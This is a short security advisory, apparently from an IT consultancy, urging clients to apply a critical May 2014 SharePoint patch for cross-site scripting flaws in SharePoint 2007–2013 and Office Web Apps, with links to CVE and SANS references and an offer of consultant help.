Sean Wallbridge
Hey folks
We’ve come across a SharePoint security concern that, if you are not already aware of, requires your attention.
To be clear – we’re not fans of fear mongering. SharePoint patches pop up frequently. We’ve identified this one as particularly critical.
We are currently applying this patch internally to protect ourselves and to develop a response to assist our clients with minimal disruption. We suggest you or your IT team treat this as a top priority and either address this yourself or schedule time with an itgroove consultant to get the patch deployed.
Here’s the background of the issue
- It’s classified as a “Critical patch” – it’s big enough that the US Department of Homeland Security is addressing it on their site.
- It impacts SharePoint 2007, 2010, 2013 and Microsoft Web Apps (Office Online).
- This patch is particularly important for sites that are connect to the internet.
Here’s the technical details
- It’s an XSS exploit/security patch – basically un-sanitized user input – making it very unlikely that it would be pulled or retro-fitted.
- This affects authorized user or anonymously exposed sites.
- It is for 3 CVEs, none under public attack, and they do require social engineering aimed at your users to trigger.
To learn more, here are some sources to review:
- https://isc.sans.edu/diary/Microsoft+May+2014+Patch+Tuesday/18113
- http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1754
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1754
Please give us a call or send us an email to book time with one of our consultants for assistance.